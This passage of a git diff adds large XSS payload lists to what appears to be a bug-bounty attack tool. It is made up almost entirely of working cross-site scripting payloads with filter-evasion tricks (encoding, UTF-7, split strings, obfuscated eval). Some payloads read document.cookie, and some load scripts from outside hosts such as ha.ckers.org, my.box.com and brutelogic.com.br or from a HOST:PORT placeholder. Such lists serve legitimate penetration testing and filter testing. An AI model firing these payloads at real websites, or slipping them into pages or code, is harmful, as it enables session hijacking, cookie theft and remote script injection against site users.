SRC="javascript:alert('XSS');"></IFRAME> 
+<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION +<form><button formaction="javascript:alert(123)">crosssitespt +<frameset onload=alert(123)> +<!--<img src="--><img src=x onerror=alert(123)//"> +<style><img src="</style><img src=x onerror=alert(123)//"> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="javascript:alert(1)"> +<? foo="><script>alert(1)</script>"> +<! 
foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<script>({0:#0=alert/#0#/#0#(123)})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> +<script src="#">{alert(1)}</script>;1 +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> +<svg xmlns="#"><script>alert(1)</script></svg> +<svg onload="javascript:alert(123)" xmlns="#"></svg> +<iframe xmlns="#" src="javascript:alert(1)"></iframe> ++ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- ++ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- +%253cscript%253ealert(document.cookie)%253c/script%253e +><s%2bcript>alert(document.cookie)</script> +><ScRiPt>alert(document.cookie)</script> +><<script>alert(document.cookie);//<</script> +foo<script>alert(document.cookie)</script> +<scr<script>ipt>alert(document.cookie)</scr</script>ipt> +%22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E +; alert(document.cookie); var foo= +foo\; alert(document.cookie);//; +</script><script >alert(document.cookie)</script> +<img src=asdf onerror=alert(document.cookie)> +<BODY ONLOAD=alert(XSS)> +<script>alert(1)</script> +"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> +<video src=1 onerror=alert(1)> +<audio src=1 onerror=alert(1)> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/xss-payload-list.txt b/bounty_drive/attacks/xss/payloads/xss-payload-list.txt new file mode 100644 index 0000000..63ed92c --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/xss-payload-list.txt 
@@ -0,0 +1,6613 @@ +"-prompt(8)-" +'-prompt(8)-' +";a=prompt,a()// +';a=prompt,a()// +'-eval("window['pro'%2B'mpt'](8)")-' +"-eval("window['pro'%2B'mpt'](8)")-" +"onclick=prompt(8)>"@x.y +"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y +<image/src/onerror=prompt(8)> +<img/src/onerror=prompt(8)> +<image src/onerror=prompt(8)> +<img src/onerror=prompt(8)> +<image src =q onerror=prompt(8)> +<img src =q onerror=prompt(8)> +</scrip</script>t><img src =q onerror=prompt(8)> +<svg onload=alert(1)> +"><svg onload=alert(1)// +"onmouseover=alert(1)// +"autofocus/onfocus=alert(1)// +'-alert(1)-' +'-alert(1)// +\'-alert(1)// +</script><svg onload=alert(1)> +<x contenteditable onblur=alert(1)>lose focus! +<x onclick=alert(1)>click this! +<x oncopy=alert(1)>copy this! +<x oncontextmenu=alert(1)>right click this! +<x oncut=alert(1)>copy this! +<x ondblclick=alert(1)>double click this! +<x ondrag=alert(1)>drag this! +<x contenteditable onfocus=alert(1)>focus this! +<x contenteditable oninput=alert(1)>input here! +<x contenteditable onkeydown=alert(1)>press any key! +<x contenteditable onkeypress=alert(1)>press any key! +<x contenteditable onkeyup=alert(1)>press any key! +<x onmousedown=alert(1)>click this! +<x onmousemove=alert(1)>hover this! +<x onmouseout=alert(1)>hover this! +<x onmouseover=alert(1)>hover this! +<x onmouseup=alert(1)>click this! +<x contenteditable onpaste=alert(1)>paste here! 
+<script>alert(1)// +<script>alert(1)<!– +<script src=//brutelogic.com.br/1.js> +<script src=//3334957647/1> +%3Cx onxxx=alert(1) +<%78 onxxx=1 +<x %6Fnxxx=1 +<x o%6Exxx=1 +<x on%78xx=1 +<x onxxx%3D1 +<X onxxx=1 +<x OnXxx=1 +<X OnXxx=1 +<x onxxx=1 onxxx=1 +<x/onxxx=1 +<x%09onxxx=1 +<x%0Aonxxx=1 +<x%0Conxxx=1 +<x%0Donxxx=1 +<x%2Fonxxx=1 +<x 1='1'onxxx=1 +<x 1="1"onxxx=1 +<x </onxxx=1 +<x 1=">" onxxx=1 +<http://onxxx%3D1/ +<x onxxx=alert(1) 1=' +<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> +'onload=alert(1)><svg/1=' +'>alert(1)</script><script/1=' +*/alert(1)</script><script>/* +*/alert(1)">'onload="/*<svg/1=' +`-alert(1)">'onload="`<svg/1=' +*/</script>'>alert(1)/*<script/1=' +<script>alert(1)</script> +<script src=javascript:alert(1)> +<iframe src=javascript:alert(1)> +<embed src=javascript:alert(1)> +<a href=javascript:alert(1)>click +<math><brute href=javascript:alert(1)>click +<form action=javascript:alert(1)><input type=submit> +<isindex action=javascript:alert(1) type=submit value=click> +<form><button formaction=javascript:alert(1)>click +<form><input formaction=javascript:alert(1) type=submit value=click> +<form><input formaction=javascript:alert(1) type=image value=click> +<form><input formaction=javascript:alert(1) type=image src=SOURCE> +<isindex formaction=javascript:alert(1) type=submit value=click> +<object data=javascript:alert(1)> +<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> +<svg><script xlink:href=data:,alert(1) /> +<math><brute xlink:href=javascript:alert(1)>click +<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> +<html ontouchstart=alert(1)> +<html ontouchend=alert(1)> +<html ontouchmove=alert(1)> +<html ontouchcancel=alert(1)> +<body onorientationchange=alert(1)> +"><img src=1 onerror=alert(1)>.gif +<svg xmlns="http://www.w3.org/2000/svg" 
onload="alert(document.domain)"/> +GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; +<script src="data:&comma;alert(1)// +"><script src=data:&comma;alert(1)// +<script src="//brutelogic.com.br&sol;1.js&num; +"><script src=//brutelogic.com.br&sol;1.js&num; +<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +<base href=//0> +<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) +<body onload=alert(1)> +<body onpageshow=alert(1)> +<body onfocus=alert(1)> +<body onhashchange=alert(1)><a href=#x>click this!#x +<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x +<body onscroll=alert(1)><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><x id=x>#x +<body onresize=alert(1)>press F12! +<body onhelp=alert(1)>press F1! (MSIE) +<marquee onstart=alert(1)> +<marquee loop=1 width=0 onfinish=alert(1)> +<audio src onloadstart=alert(1)> +<video onloadstart=alert(1)><source> +<input autofocus onblur=alert(1)> +<keygen autofocus onfocus=alert(1)> +<form onsubmit=alert(1)><input type=submit> +<select onchange=alert(1)><option>1<option>2 +<menu id=x contextmenu=x onshow=alert(1)>right click me! 
+alert`1` +alert&lpar;1&rpar; +alert&#x28;1&#x29 +alert&#40;1&#41 +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +navigator.vibrate(500) +eval(URL.slice(-8))>#alert(1) +eval(location.hash.slice(1)>#alert(1) +innerHTML=location.hash>#<script>alert(1)</script> +<a draggable="true" ondrag="alert(1)">test</a> +<a draggable="true" ondragend="alert(1)">test</a> +<a draggable="true" ondragenter="alert(1)">test</a> +<a draggable="true" ondragleave="alert(1)">test</a> +<a draggable="true" ondragstart="alert(1)">test</a> +<a id=x tabindex=1 onactivate=alert(1)></a> +<a id=x tabindex=1 onbeforeactivate=alert(1)></a> +<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus> +<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus> +<a id=x tabindex=1 onfocus=alert(1)></a> +<a id=x tabindex=1 onfocusin=alert(1)></a> +<a onbeforecopy="alert(1)" contenteditable>test</a> +<a onbeforecut="alert(1)" contenteditable>test</a> +<a onbeforepaste="alert(1)" contenteditable>test</a> +<a onblur=alert(1) tabindex=1 id=x></a><input autofocus> +<a onclick="alert(1)">test</a> +<a oncontextmenu="alert(1)">test</a> +<a oncopy="alert(1)" contenteditable>test</a> +<a oncut="alert(1)" contenteditable>test</a> +<a ondblclick="alert(1)">test</a> +<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus> +<a onkeydown="alert(1)" contenteditable>test</a> +<a onkeypress="alert(1)" contenteditable>test</a> +<a onkeyup="alert(1)" contenteditable>test</a> +<a onmousedown="alert(1)">test</a> +<a onmouseenter="alert(1)">test</a> +<a onmouseleave="alert(1)">test</a> +<a onmousemove="alert(1)">test</a> +<a onmouseout="alert(1)">test</a> +<a onmouseover="alert(1)">test</a> +<a onmouseup="alert(1)">test</a> +<a onpaste="alert(1)" contenteditable>test</a> +<abbr draggable="true" ondrag="alert(1)">test</abbr> +<abbr draggable="true" 
ondragend="alert(1)">test</abbr> +<abbr draggable="true" ondragenter="alert(1)">test</abbr> +<abbr draggable="true" ondragleave="alert(1)">test</abbr> +<abbr draggable="true" ondragstart="alert(1)">test</abbr> +<abbr id=x tabindex=1 onactivate=alert(1)></abbr> +<abbr id=x tabindex=1 onbeforeactivate=alert(1)></abbr> +<abbr id=x tabindex=1 onbeforedeactivate=alert(1)></abbr><input autofocus> +<abbr id=x tabindex=1 ondeactivate=alert(1)></abbr><input id=y autofocus> +<abbr id=x tabindex=1 onfocus=alert(1)></abbr> +<abbr id=x tabindex=1 onfocusin=alert(1)></abbr> +<abbr onbeforecopy="alert(1)" contenteditable>test</abbr> +<abbr onbeforecut="alert(1)" contenteditable>test</abbr> +<abbr onbeforepaste="alert(1)" contenteditable>test</abbr> +<abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus> +<abbr onclick="alert(1)">test</abbr> +<abbr oncontextmenu="alert(1)">test</abbr> +<abbr oncopy="alert(1)" contenteditable>test</abbr> +<abbr oncut="alert(1)" contenteditable>test</abbr> +<abbr ondblclick="alert(1)">test</abbr> +<abbr onfocusout=alert(1) tabindex=1 id=x></abbr><input autofocus> +<abbr onkeydown="alert(1)" contenteditable>test</abbr> +<abbr onkeypress="alert(1)" contenteditable>test</abbr> +<abbr onkeyup="alert(1)" contenteditable>test</abbr> +<abbr onmousedown="alert(1)">test</abbr> +<abbr onmouseenter="alert(1)">test</abbr> +<abbr onmouseleave="alert(1)">test</abbr> +<abbr onmousemove="alert(1)">test</abbr> +<abbr onmouseout="alert(1)">test</abbr> +<abbr onmouseover="alert(1)">test</abbr> +<abbr onmouseup="alert(1)">test</abbr> +<abbr onpaste="alert(1)" contenteditable>test</abbr> +<acronym draggable="true" ondrag="alert(1)">test</acronym> +<acronym draggable="true" ondragend="alert(1)">test</acronym> +<acronym draggable="true" ondragenter="alert(1)">test</acronym> +<acronym draggable="true" ondragleave="alert(1)">test</acronym> +<acronym draggable="true" ondragstart="alert(1)">test</acronym> +<acronym id=x tabindex=1 onactivate=alert(1)></acronym> 
+<acronym id=x tabindex=1 onbeforeactivate=alert(1)></acronym> +<acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus> +<acronym id=x tabindex=1 ondeactivate=alert(1)></acronym><input id=y autofocus> +<acronym id=x tabindex=1 onfocus=alert(1)></acronym> +<acronym id=x tabindex=1 onfocusin=alert(1)></acronym> +<acronym onbeforecopy="alert(1)" contenteditable>test</acronym> +<acronym onbeforecut="alert(1)" contenteditable>test</acronym> +<acronym onbeforepaste="alert(1)" contenteditable>test</acronym> +<acronym onblur=alert(1) tabindex=1 id=x></acronym><input autofocus> +<acronym onclick="alert(1)">test</acronym> +<acronym oncontextmenu="alert(1)">test</acronym> +<acronym oncopy="alert(1)" contenteditable>test</acronym> +<acronym oncut="alert(1)" contenteditable>test</acronym> +<acronym ondblclick="alert(1)">test</acronym> +<acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus> +<acronym onkeydown="alert(1)" contenteditable>test</acronym> +<acronym onkeypress="alert(1)" contenteditable>test</acronym> +<acronym onkeyup="alert(1)" contenteditable>test</acronym> +<acronym onmousedown="alert(1)">test</acronym> +<acronym onmouseenter="alert(1)">test</acronym> +<acronym onmouseleave="alert(1)">test</acronym> +<acronym onmousemove="alert(1)">test</acronym> +<acronym onmouseout="alert(1)">test</acronym> +<acronym onmouseover="alert(1)">test</acronym> +<acronym onmouseup="alert(1)">test</acronym> +<acronym onpaste="alert(1)" contenteditable>test</acronym> +<address draggable="true" ondrag="alert(1)">test</address> +<address draggable="true" ondragend="alert(1)">test</address> +<address draggable="true" ondragenter="alert(1)">test</address> +<address draggable="true" ondragleave="alert(1)">test</address> +<address draggable="true" ondragstart="alert(1)">test</address> +<address id=x tabindex=1 onactivate=alert(1)></address> +<address id=x tabindex=1 onbeforeactivate=alert(1)></address> +<address id=x tabindex=1 
onbeforedeactivate=alert(1)></address><input autofocus> +<address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus> +<address id=x tabindex=1 onfocus=alert(1)></address> +<address id=x tabindex=1 onfocusin=alert(1)></address> +<address onbeforecopy="alert(1)" contenteditable>test</address> +<address onbeforecut="alert(1)" contenteditable>test</address> +<address onbeforepaste="alert(1)" contenteditable>test</address> +<address onblur=alert(1) tabindex=1 id=x></address><input autofocus> +<address onclick="alert(1)">test</address> +<address oncontextmenu="alert(1)">test</address> +<address oncopy="alert(1)" contenteditable>test</address> +<address oncut="alert(1)" contenteditable>test</address> +<address ondblclick="alert(1)">test</address> +<address onfocusout=alert(1) tabindex=1 id=x></address><input autofocus> +<address onkeydown="alert(1)" contenteditable>test</address> +<address onkeypress="alert(1)" contenteditable>test</address> +<address onkeyup="alert(1)" contenteditable>test</address> +<address onmousedown="alert(1)">test</address> +<address onmouseenter="alert(1)">test</address> +<address onmouseleave="alert(1)">test</address> +<address onmousemove="alert(1)">test</address> +<address onmouseout="alert(1)">test</address> +<address onmouseover="alert(1)">test</address> +<address onmouseup="alert(1)">test</address> +<address onpaste="alert(1)" contenteditable>test</address> +<applet draggable="true" ondrag="alert(1)">test</applet> +<applet draggable="true" ondragend="alert(1)">test</applet> +<applet draggable="true" ondragenter="alert(1)">test</applet> +<applet draggable="true" ondragleave="alert(1)">test</applet> +<applet draggable="true" ondragstart="alert(1)">test</applet> +<applet id=x tabindex=1 onactivate=alert(1)></applet> +<applet id=x tabindex=1 onbeforeactivate=alert(1)></applet> +<applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus> +<applet id=x tabindex=1 ondeactivate=alert(1)></applet><input id=y 
autofocus> +<applet id=x tabindex=1 onfocus=alert(1)></applet> +<applet id=x tabindex=1 onfocusin=alert(1)></applet> +<applet onbeforecopy="alert(1)" contenteditable>test</applet> +<applet onbeforecut="alert(1)" contenteditable>test</applet> +<applet onbeforepaste="alert(1)" contenteditable>test</applet> +<applet onblur=alert(1) tabindex=1 id=x></applet><input autofocus> +<applet onclick="alert(1)">test</applet> +<applet oncontextmenu="alert(1)">test</applet> +<applet oncopy="alert(1)" contenteditable>test</applet> +<applet oncut="alert(1)" contenteditable>test</applet> +<applet ondblclick="alert(1)">test</applet> +<applet onfocusout=alert(1) tabindex=1 id=x></applet><input autofocus> +<applet onkeydown="alert(1)" contenteditable>test</applet> +<applet onkeypress="alert(1)" contenteditable>test</applet> +<applet onkeyup="alert(1)" contenteditable>test</applet> +<applet onmousedown="alert(1)">test</applet> +<applet onmouseenter="alert(1)">test</applet> +<applet onmouseleave="alert(1)">test</applet> +<applet onmousemove="alert(1)">test</applet> +<applet onmouseout="alert(1)">test</applet> +<applet onmouseover="alert(1)">test</applet> +<applet onmouseup="alert(1)">test</applet> +<applet onpaste="alert(1)" contenteditable>test</applet> +<applet onreadystatechange=alert(1)></applet> +<area draggable="true" ondrag="alert(1)">test</area> +<area draggable="true" ondragend="alert(1)">test</area> +<area draggable="true" ondragenter="alert(1)">test</area> +<area draggable="true" ondragleave="alert(1)">test</area> +<area draggable="true" ondragstart="alert(1)">test</area> +<area id=x tabindex=1 onactivate=alert(1)></area> +<area id=x tabindex=1 onbeforeactivate=alert(1)></area> +<area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus> +<area id=x tabindex=1 ondeactivate=alert(1)></area><input id=y autofocus> +<area onbeforecopy="alert(1)" contenteditable>test</area> +<area onbeforecut="alert(1)" contenteditable>test</area> +<area onbeforepaste="alert(1)" 
contenteditable>test</area> +<area onblur=alert(1) tabindex=1 id=x></area><input autofocus> +<area onclick="alert(1)">test</area> +<area oncontextmenu="alert(1)">test</area> +<area oncopy="alert(1)" contenteditable>test</area> +<area oncut="alert(1)" contenteditable>test</area> +<area ondblclick="alert(1)">test</area> +<area onfocusout=alert(1) tabindex=1 id=x></area><input autofocus> +<area onkeydown="alert(1)" contenteditable>test</area> +<area onkeypress="alert(1)" contenteditable>test</area> +<area onkeyup="alert(1)" contenteditable>test</area> +<area onmousedown="alert(1)">test</area> +<area onmouseenter="alert(1)">test</area> +<area onmouseleave="alert(1)">test</area> +<area onmousemove="alert(1)">test</area> +<area onmouseout="alert(1)">test</area> +<area onmouseover="alert(1)">test</area> +<area onmouseup="alert(1)">test</area> +<area onpaste="alert(1)" contenteditable>test</area> +<article draggable="true" ondrag="alert(1)">test</article> +<article draggable="true" ondragend="alert(1)">test</article> +<article draggable="true" ondragenter="alert(1)">test</article> +<article draggable="true" ondragleave="alert(1)">test</article> +<article draggable="true" ondragstart="alert(1)">test</article> +<article id=x tabindex=1 onactivate=alert(1)></article> +<article id=x tabindex=1 onbeforeactivate=alert(1)></article> +<article id=x tabindex=1 onbeforedeactivate=alert(1)></article><input autofocus> +<article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus> +<article id=x tabindex=1 onfocus=alert(1)></article> +<article id=x tabindex=1 onfocusin=alert(1)></article> +<article onbeforecopy="alert(1)" contenteditable>test</article> +<article onbeforecut="alert(1)" contenteditable>test</article> +<article onbeforepaste="alert(1)" contenteditable>test</article> +<article onblur=alert(1) tabindex=1 id=x></article><input autofocus> +<article onclick="alert(1)">test</article> +<article oncontextmenu="alert(1)">test</article> +<article oncopy="alert(1)" 
contenteditable>test</article> +<article oncut="alert(1)" contenteditable>test</article> +<article ondblclick="alert(1)">test</article> +<article onfocusout=alert(1) tabindex=1 id=x></article><input autofocus> +<article onkeydown="alert(1)" contenteditable>test</article> +<article onkeypress="alert(1)" contenteditable>test</article> +<article onkeyup="alert(1)" contenteditable>test</article> +<article onmousedown="alert(1)">test</article> +<article onmouseenter="alert(1)">test</article> +<article onmouseleave="alert(1)">test</article> +<article onmousemove="alert(1)">test</article> +<article onmouseout="alert(1)">test</article> +<article onmouseover="alert(1)">test</article> +<article onmouseup="alert(1)">test</article> +<article onpaste="alert(1)" contenteditable>test</article> +<aside draggable="true" ondrag="alert(1)">test</aside> +<aside draggable="true" ondragend="alert(1)">test</aside> +<aside draggable="true" ondragenter="alert(1)">test</aside> +<aside draggable="true" ondragleave="alert(1)">test</aside> +<aside draggable="true" ondragstart="alert(1)">test</aside> +<aside id=x tabindex=1 onactivate=alert(1)></aside> +<aside id=x tabindex=1 onbeforeactivate=alert(1)></aside> +<aside id=x tabindex=1 onbeforedeactivate=alert(1)></aside><input autofocus> +<aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus> +<aside id=x tabindex=1 onfocus=alert(1)></aside> +<aside id=x tabindex=1 onfocusin=alert(1)></aside> +<aside onbeforecopy="alert(1)" contenteditable>test</aside> +<aside onbeforecut="alert(1)" contenteditable>test</aside> +<aside onbeforepaste="alert(1)" contenteditable>test</aside> +<aside onblur=alert(1) tabindex=1 id=x></aside><input autofocus> +<aside onclick="alert(1)">test</aside> +<aside oncontextmenu="alert(1)">test</aside> +<aside oncopy="alert(1)" contenteditable>test</aside> +<aside oncut="alert(1)" contenteditable>test</aside> +<aside ondblclick="alert(1)">test</aside> +<aside onfocusout=alert(1) tabindex=1 
id=x></aside><input autofocus> +<aside onkeydown="alert(1)" contenteditable>test</aside> +<aside onkeypress="alert(1)" contenteditable>test</aside> +<aside onkeyup="alert(1)" contenteditable>test</aside> +<aside onmousedown="alert(1)">test</aside> +<aside onmouseenter="alert(1)">test</aside> +<aside onmouseleave="alert(1)">test</aside> +<aside onmousemove="alert(1)">test</aside> +<aside onmouseout="alert(1)">test</aside> +<aside onmouseover="alert(1)">test</aside> +<aside onmouseup="alert(1)">test</aside> +<aside onpaste="alert(1)" contenteditable>test</aside> +<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio draggable="true" ondrag="alert(1)">test</audio> +<audio draggable="true" ondragend="alert(1)">test</audio> +<audio draggable="true" ondragenter="alert(1)">test</audio> +<audio draggable="true" ondragleave="alert(1)">test</audio> +<audio draggable="true" ondragstart="alert(1)">test</audio> +<audio id=x controls onfocus=alert(1) id=x><source src="validaudio.wav"></audio> +<audio id=x controls onfocusin=alert(1) id=x><source src="validaudio.wav"></audio> +<audio id=x tabindex=1 onactivate=alert(1)></audio> +<audio id=x tabindex=1 
onbeforeactivate=alert(1)></audio> +<audio id=x tabindex=1 onbeforedeactivate=alert(1)></audio><input autofocus> +<audio id=x tabindex=1 ondeactivate=alert(1)></audio><input id=y autofocus> +<audio onbeforecopy="alert(1)" contenteditable>test</audio> +<audio onbeforecut="alert(1)" contenteditable>test</audio> +<audio onbeforepaste="alert(1)" contenteditable>test</audio> +<audio onblur=alert(1) tabindex=1 id=x></audio><input autofocus> +<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio onclick="alert(1)">test</audio> +<audio oncontextmenu="alert(1)">test</audio> +<audio oncopy="alert(1)" contenteditable>test</audio> +<audio oncut="alert(1)" contenteditable>test</audio> +<audio ondblclick="alert(1)">test</audio> +<audio onfocusout=alert(1) tabindex=1 id=x></audio><input autofocus> +<audio onkeydown="alert(1)" contenteditable>test</audio> +<audio onkeypress="alert(1)" contenteditable>test</audio> +<audio onkeyup="alert(1)" contenteditable>test</audio> +<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio onmousedown="alert(1)">test</audio> +<audio onmouseenter="alert(1)">test</audio> +<audio onmouseleave="alert(1)">test</audio> +<audio onmousemove="alert(1)">test</audio> +<audio onmouseout="alert(1)">test</audio> +<audio onmouseover="alert(1)">test</audio> +<audio onmouseup="alert(1)">test</audio> +<audio onpaste="alert(1)" contenteditable>test</audio> +<audio src/onerror=alert(1)> +<b draggable="true" ondrag="alert(1)">test</b> +<b draggable="true" ondragend="alert(1)">test</b> +<b draggable="true" ondragenter="alert(1)">test</b> +<b draggable="true" ondragleave="alert(1)">test</b> +<b draggable="true" ondragstart="alert(1)">test</b> +<b id=x tabindex=1 onactivate=alert(1)></b> +<b id=x tabindex=1 onbeforeactivate=alert(1)></b> +<b id=x tabindex=1 onbeforedeactivate=alert(1)></b><input autofocus> +<b id=x tabindex=1 ondeactivate=alert(1)></b><input id=y autofocus> +<b id=x tabindex=1 
onfocus=alert(1)></b> +<b id=x tabindex=1 onfocusin=alert(1)></b> +<b onbeforecopy="alert(1)" contenteditable>test</b> +<b onbeforecut="alert(1)" contenteditable>test</b> +<b onbeforepaste="alert(1)" contenteditable>test</b> +<b onblur=alert(1) tabindex=1 id=x></b><input autofocus> +<b onclick="alert(1)">test</b> +<b oncontextmenu="alert(1)">test</b> +<b oncopy="alert(1)" contenteditable>test</b> +<b oncut="alert(1)" contenteditable>test</b> +<b ondblclick="alert(1)">test</b> +<b onfocusout=alert(1) tabindex=1 id=x></b><input autofocus> +<b onkeydown="alert(1)" contenteditable>test</b> +<b onkeypress="alert(1)" contenteditable>test</b> +<b onkeyup="alert(1)" contenteditable>test</b> +<b onmousedown="alert(1)">test</b> +<b onmouseenter="alert(1)">test</b> +<b onmouseleave="alert(1)">test</b> +<b onmousemove="alert(1)">test</b> +<b onmouseout="alert(1)">test</b> +<b onmouseover="alert(1)">test</b> +<b onmouseup="alert(1)">test</b> +<b onpaste="alert(1)" contenteditable>test</b> +<base draggable="true" ondrag="alert(1)">test</base> +<base draggable="true" ondragend="alert(1)">test</base> +<base draggable="true" ondragenter="alert(1)">test</base> +<base draggable="true" ondragleave="alert(1)">test</base> +<base draggable="true" ondragstart="alert(1)">test</base> +<base id=x tabindex=1 onactivate=alert(1)></base> +<base id=x tabindex=1 onbeforeactivate=alert(1)></base> +<base id=x tabindex=1 onbeforedeactivate=alert(1)></base><input autofocus> +<base id=x tabindex=1 ondeactivate=alert(1)></base><input id=y autofocus> +<base id=x tabindex=1 onfocus=alert(1)></base> +<base id=x tabindex=1 onfocusin=alert(1)></base> +<base onbeforecopy="alert(1)" contenteditable>test</base> +<base onbeforecut="alert(1)" contenteditable>test</base> +<base onbeforepaste="alert(1)" contenteditable>test</base> +<base onblur=alert(1) tabindex=1 id=x></base><input autofocus> +<base onclick="alert(1)">test</base> +<base oncontextmenu="alert(1)">test</base> +<base oncopy="alert(1)" 
contenteditable>test</base> +<base oncut="alert(1)" contenteditable>test</base> +<base ondblclick="alert(1)">test</base> +<base onfocusout=alert(1) tabindex=1 id=x></base><input autofocus> +<base onkeydown="alert(1)" contenteditable>test</base> +<base onkeypress="alert(1)" contenteditable>test</base> +<base onkeyup="alert(1)" contenteditable>test</base> +<base onmousedown="alert(1)">test</base> +<base onmouseenter="alert(1)">test</base> +<base onmouseleave="alert(1)">test</base> +<base onmousemove="alert(1)">test</base> +<base onmouseout="alert(1)">test</base> +<base onmouseover="alert(1)">test</base> +<base onmouseup="alert(1)">test</base> +<base onpaste="alert(1)" contenteditable>test</base> +<basefont draggable="true" ondrag="alert(1)">test</basefont> +<basefont draggable="true" ondragend="alert(1)">test</basefont> +<basefont draggable="true" ondragenter="alert(1)">test</basefont> +<basefont draggable="true" ondragleave="alert(1)">test</basefont> +<basefont draggable="true" ondragstart="alert(1)">test</basefont> +<basefont id=x tabindex=1 onactivate=alert(1)></basefont> +<basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont> +<basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus> +<basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus> +<basefont id=x tabindex=1 onfocus=alert(1)></basefont> +<basefont id=x tabindex=1 onfocusin=alert(1)></basefont> +<basefont onbeforecopy="alert(1)" contenteditable>test</basefont> +<basefont onbeforecut="alert(1)" contenteditable>test</basefont> +<basefont onbeforepaste="alert(1)" contenteditable>test</basefont> +<basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus> +<basefont onclick="alert(1)">test</basefont> +<basefont oncontextmenu="alert(1)">test</basefont> +<basefont oncopy="alert(1)" contenteditable>test</basefont> +<basefont oncut="alert(1)" contenteditable>test</basefont> +<basefont ondblclick="alert(1)">test</basefont> +<basefont 
